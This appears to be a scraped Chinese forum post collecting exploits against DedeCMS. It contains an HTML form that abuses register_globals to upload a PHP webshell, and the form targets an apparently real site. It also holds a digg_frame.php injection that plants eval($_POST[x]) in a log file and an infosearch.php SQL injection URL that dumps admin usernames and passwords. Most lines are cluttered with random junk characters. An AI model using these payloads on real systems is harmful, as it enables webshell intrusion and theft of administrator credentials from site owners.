<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>" r# J- K; |, U7 O% _; Q8 x+ ^) [0 L
</head>! _9 G; l$ w- r/ M$ p, y8 D8 {' s2 k/ R
<body style="FONT-SIZE: 9pt">
1 ^; \% t' n( E" N# u6 y; Y" M3 o---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
5 U2 C7 K; U( l5 B' O<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
2 u' W5 Q' ?0 x$ F2 G9 h8 x<input type='hidden' name='activepath' value='/data/cache/' />5 o" e! V$ w' m) x# |% R2 z0 ~
<input type='hidden' name='cfg_basedir' value='../../' />2 \0 F5 H# [$ E/ ~
<input type='hidden' name='cfg_imgtype' value='php' />) G" k7 O' g+ h8 @! h
<input type='hidden' name='cfg_not_allowall' value='txt' /># s; B' B. W1 L9 T# e' k
<input type='hidden' name='cfg_softtype' value='php' />
7 [( l, ?3 Y* q2 o<input type='hidden' name='cfg_mediatype' value='php' />
, p+ k% f4 f7 |; v1 P<input type='hidden' name='f' value='form1.enclosure' />1 Z% [, z% W, \$ m7 \
<input type='hidden' name='job' value='upload' />
: S8 z' M* C. \8 O- v6 _' M<input type='hidden' name='newname' value='fly.php' />( E6 G: X* i; z
Select U Shell <input type='file' name='uploadfile' size='25' />
2 @8 Q; o6 R. y$ @( a<input type='submit' name='sb1' value='确定' />& n- L9 ~: b8 c/ _' u1 P
</form>
: [" N# {7 x2 [# p! j ]3 C; ^<br />It's just a exp for the bug of Dedecms V55...<br />
1 C) q9 ^+ W( M$ W; GNeed register_globals = on...<br />& [7 u% t' A' w9 G6 W8 S6 U
Fun the game,get a webshell at /data/cache/fly.php...<br />$ v* I: s. N" z) h ?/ \
</body>$ {8 u3 X0 k# ~: p$ u3 Z
</html>1 c. Y! P$ t7 H4 Q( v: O( x
/ X# ~ m" U; U1 J; i9 [0 j
# q: F5 Q4 U/ z. r2 p
9 K, M1 [1 `$ ~: `' @$ g- g1 @- q9 \
, r/ ]- [% f* q! n
% T7 n$ b+ y" ~/ f; \
6 k% B! t! T8 k0 S+ F: P3 `
+ p" X0 b- i/ g: @8 B% g, R0 C# Y E
1 m7 P* h3 a a
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞3 N9 f+ Q$ Z2 g- F4 Y* S3 G5 h- y( r
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
" H( e4 Z# s* u* g% z) Z1. 访问网址:
* J" C6 J, \$ H% C5 bhttp://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
7 C9 U" B. b- |8 k' J可看见错误信息
% q, E! k: D9 s9 X7 @5 ~. W) i/ U% D1 r2 `0 q& ?/ Q {
+ d2 A: u5 P7 m/ R u
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
; R3 I; g, E [+ dint(3) Error: Illegal double '1024e1024' value found during parsing
2 M2 _: g# ~3 U( M( t$ cError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
+ R- H; d0 U! f2 C% ^% Q! F6 u! [
6 u r1 L2 S0 j& R+ k8 z/ a$ f" m
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是" K/ a' j# b) h9 z' C4 x; K7 }% E
, L- E( G/ V Q2 p) x' p9 z7 S
4 \- Z/ u5 o! M. J4 S" P# m<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
* h6 |0 d$ j6 f3 Q, T* q* m, N! {' K" F& k
& H" ]! U' f- {/ r% Y$ h按确定后的看到第2步骤的信息表示文件木马上传成功.
) s0 ^% P6 }( a' X# n) i/ L% i6 H/ x8 L
; ~9 e1 e3 Z1 t% e) F
4 m# |) f G4 e3 v3 [
, W5 X; w1 |" y) b0 i
# l5 k5 ~. D8 a4 f/ z
Q7 @( a* v. V- b
& b( x D, g1 o3 d: \! S& J+ J |6 z' @( U9 ?; B5 b
' J8 d: [- B) [* z( L3 D# g1 u% [/ T3 B( k7 m# K7 r
( O2 z. b, B; b1 \, M3 v; ^; m `' D! C5 P
织梦(DedeCms)plus/infosearch.php 文件注入漏洞
. _: I5 G @1 ~: j% u" ^7 |+ O+ Ghttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对